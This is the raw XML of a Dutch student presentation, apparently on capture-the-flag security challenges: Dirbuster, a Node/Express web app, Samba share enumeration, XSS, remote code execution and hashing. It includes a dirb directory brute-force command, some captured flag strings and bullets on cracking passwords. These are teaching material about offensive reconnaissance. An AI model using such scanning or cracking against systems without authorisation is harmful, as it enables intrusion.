                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web app security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hashing Challenge </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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16D0E74-0C82-F205-F2FD-C1F1B5A79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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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571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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ECE3C9-4EAD-7C1F-B3F4-9C4E9649E2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2990F35-D354-55C1-A153-F64A1A6F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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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447D7A2-9BA1-98C2-9BA6-F26B5E728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Wat?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bruteforce</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Files, pages, directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wie?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pen testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>developers</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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A4AC7B1-3B7D-3AD8-C25A-77448DF70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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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7505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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9D3ABA-D7DA-A8A5-94D8-21123F9F7A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64CCB5E-4E61-3A0B-121E-97B10860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Modern web app: Opdracht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F79F02B-A4D7-85CF-7F16-E571119B6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Korte uitleg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -X .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flags</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>robots.txt = PXL{1f38e5a752c90bde71751bd33f1c599b}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin.html = PXL{1f38e5a752c90bde71751bd33f1c599b}</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204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F16AA5D-16A2-EAC3-B762-7906B4E0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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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0960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Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7ECF03D-FE91-DE9B-8460-A2BFD2A01E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33887" y="25410"/>
            <a:ext cx="12191979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0C2AFE7-ACDE-41B6-5B24-6F8EC345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nl-BE" sz="5000" dirty="0"/>
              <a:t>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7CC34A-6130-21BD-B0C0-D202A9335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0899"/>
            <a:ext cx="10506456" cy="2670048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2400" dirty="0"/>
              <a:t>wat?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000" dirty="0" err="1"/>
              <a:t>NodeJS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>Scalable</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0"/>
              <a:t>Event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>driven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>architecture</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>Lightweight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>fast</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000" dirty="0" err="1"/>
              <a:t>ExpressJS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0"/>
              <a:t>Minimalistisch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>Flexible</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0"/>
              <a:t>Webapplicaties &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1600" dirty="0" err="1"/>
              <a:t>API’s</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="nl-BE" sz="1600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8B8F5A2-9857-9F2D-C544-8AEF537F9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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL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BD535086-A46C-998D-635E-758A1A9A3212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="556591"/>
            <a:ext cx="10039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nl-BE" sz="4000" dirty="0"/>
              <a:t>Modern web app: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="4000" dirty="0" err="1"/>
              <a:t>NodeJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="4000" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="4000" dirty="0" err="1"/>
              <a:t>ExpressJS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="4000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18769F7-88B4-8C7E-EBFB-83AE6D21A67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="4947557"/>
            <a:ext cx="611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81305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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9CF7AF-D556-01E5-3F20-2A07837F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1" b="14381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BD582BA-D0CA-8598-F5AF-F4193B60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219"/>
            <a:ext cx="539591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Modern web app: Front &amp; Backend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Afbeelding 4" descr="Afbeelding met diagram&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5723AF2-60C3-3DF5-70AF-4BA85ECFA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/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2866574" y="2315133"/>
            <a:ext cx="6458851" cy="3372321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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53163B6-AD4B-A34B-1B7F-16C76367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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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9024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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7DBBCE-94A2-2C50-0696-1D60A1747A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58C9088-6B67-93E7-0B30-27D777F3E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Modern web app: Conclusie &amp; Gebruik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41ED53B-194C-F4B0-A7E8-08F86C7DB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Conclusie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netflix</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NASA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uber</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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1256678-5352-6935-9760-2B81493B9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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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7084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4" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A7E396-2AEC-C8DD-03F6-883FC934A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29" r="13727" b="909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531C897-EC79-8F97-B440-B0EE32473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585555"/>
            <a:ext cx="3438144" cy="1124712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2800"/>
              <a:t>Samba Challenge: Opdracht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997DF12-EABE-3062-2F56-7983A5E26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87" y="1825371"/>
            <a:ext cx="11295972" cy="3207258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0"/>
              <a:t>Korte uitleg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Zoekt shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kraakt wachtwoorden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Analyseert inhoud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Lijst shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Connecties tussen shares</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-BE" sz="1800" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> en files</a:t>
            </a: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9F2A14F4-002C-6F39-62A1-9E1C4D92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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Afbeelding 9" descr="Afbeelding met tekst&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACE41D4-4BD6-1787-A4E3-F2F28ECA4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973" y="3156640"/>
            <a:ext cx="5245570" cy="1243115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Afbeelding 11" descr="Afbeelding met tekst&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5012526D-B078-45AA-344C-965621B75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973" y="1785662"/>
            <a:ext cx="5858932" cy="774855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Afbeelding 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861F747A-47E1-7D9E-B79B-5830B2F756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1973" y="362581"/>
            <a:ext cx="5858933" cy="78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21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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E399BE34-975E-705A-5A81-D607657206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32884F3-FCC0-50F1-9491-0EC19BCF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Samba Challenge: Samba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88688A-1B25-5C97-00F8-00746A257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Wat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bestandsdelingsprotocol met beveiligingsfuncties.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruik</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Eenvoudig bestanden delen met geavanceerde beveiliging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Veilige bestandsdeling voor efficiënte samenwerking.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri" panose="020F0502020204030204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80EDDA-B644-FA9D-A794-95690D41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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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4293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630</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breedbeeld</PresentationFormat>
  <Paragraphs>196</Paragraphs>
  <Slides>24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Presentatie PE</vt:lpstr>
      <vt:lpstr>Inhoud</vt:lpstr>
      <vt:lpstr>Dirbuster</vt:lpstr>
      <vt:lpstr>Modern web app: Opdracht</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Modern web app: Front &amp; Backend</vt:lpstr>
      <vt:lpstr>Modern web app: Conclusie &amp; Gebruik</vt:lpstr>
      <vt:lpstr>Samba Challenge: Opdracht</vt:lpstr>
      <vt:lpstr>Samba Challenge: Samba</vt:lpstr>
      <vt:lpstr>Samba Challenge: SMBclient</vt:lpstr>
      <vt:lpstr>Samba Challenge: Conclusie</vt:lpstr>
      <vt:lpstr>XSS 1: Opdracht – Payload 1 - 2</vt:lpstr>
      <vt:lpstr>XSS 1: Opdracht – Payload 3 - 4</vt:lpstr>
      <vt:lpstr>XSS 1: Opdracht – Payload 5 - 6</vt:lpstr>
      <vt:lpstr>Web application security: Opdracht</vt:lpstr>
      <vt:lpstr>Web application security: Cross site scripting</vt:lpstr>
      <vt:lpstr>Web application security: Remote code execution</vt:lpstr>
      <vt:lpstr>Conclusie: XSS 1 – 2 &amp; Web app security</vt:lpstr>
      <vt:lpstr>Hashing challenge: Opdracht</vt:lpstr>
      <vt:lpstr>Hashing challenge: Soorten decoders</vt:lpstr>
      <vt:lpstr>Hashing challenge: Rainbow tables</vt:lpstr>
      <vt:lpstr>Hashing Challenge: Conclusie</vt:lpstr>
      <vt:lpstr>Wat hebben we geleerd: SOS Klaas</vt:lpstr>
      <vt:lpstr>Vragen + slide nummers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Presentatie PE</dc:title>
  <dc:creator>Fenne Thijs</dc:creator>
  <cp:lastModifiedBy>Iben Jackers</cp:lastModifiedBy>
  <cp:revision>133</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-10T09:43:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-17T08:47:06Z</dcterms:modified>
</cp:coreProperties>
</file>